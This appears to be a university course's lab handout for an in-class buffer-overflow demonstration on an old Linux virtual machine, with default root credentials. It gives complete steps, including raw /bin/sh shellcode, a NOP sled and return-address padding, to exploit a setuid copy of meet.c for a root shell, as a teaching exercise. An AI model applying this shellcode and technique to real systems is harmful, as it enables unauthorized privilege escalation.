These in-class demonstrations are designed to work inside a virtual machine running (an ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or vmware. CSL Linux machines all have VirtualBox pre-installed.
- Download Oracle's Virtual Box: https://www.virtualbox.org/wiki/Downloads
- Download vmware: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
- OVF: http://pages.cs.wisc.edu/~ace/assets/Boxes2.ovf
- Disk: http://pages.cs.wisc.edu/~ace/assets/Boxes2-disk1.vmdk
Image: http://pages.cs.wisc.edu/~ace/assets/vmware-boxes-2.1.tar.bz2
- The user account username/password:
user/user - The root account username/password:
root/root
Sometimes accessing the VM via SSH is easier (copy-paste may work better, and you can transfer files both way using the scp command). Startup the VM, login as user or root, find the local IP address using the command:
/sbin/ifconfig
Find the inet address assigned to this VM.
inet addr:172.16.250.140
Connect via SSH:
Copy files TO the VM:
scp demo/* [email protected]:~/
Copy files FROM the VM:
scp [email protected]:~/* demo/
This meet.c exploit demo is taken form Chapter 11 of the Ethicial Hacker's Handbook (http://www.pdf-archive.com/2011/02/23/gray-hat-hacking/gray-hat-hacking.pdf). See this document if you get stuck and need more information.
On the VM, after you've copied these source files, compile the source code.
gcc -o meet meet.c
gcc -o get_sp get_sp.c
./meet Ace H@x0r
perl -e 'print "A"x200'
echo $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x200')
./meet Ace $(perl -e 'print "A"x500')
Make a copy of meet and mark setuid (remember root password is root).
su root
cp meet super-meet
chown root:root super-meet
chmod u+s super-meet
exit
Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.
perl -e 'print
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode
Check the length: shellcode should be 53. If not, something is wrong. Maybe you accidentally added an unintended line break or some other character.
wc -c shellcode
./get_sp
Check it twice! It shouldn't change.
./get_sp
Compute an approximate landing spot: ESP - 0x300
(In the lines below, substitute your own ESP values.)
Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372
Convert to little-endian: 0x72 0xf3 0xff 0xbf Use perl to print these 38 times
perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat
Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....
./meet ace $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)
Check super-meet, should be marked setuid
ls -l
Check your id, should be user(1000)
id
Run the exploit against super-meet. If you get a shell, check your uid using id.
./super-meet ace "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
gcc -o width width.c
./width 5 "Hello there"
./width 85 "Hello there"
./width 65536 "Hello there"
If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.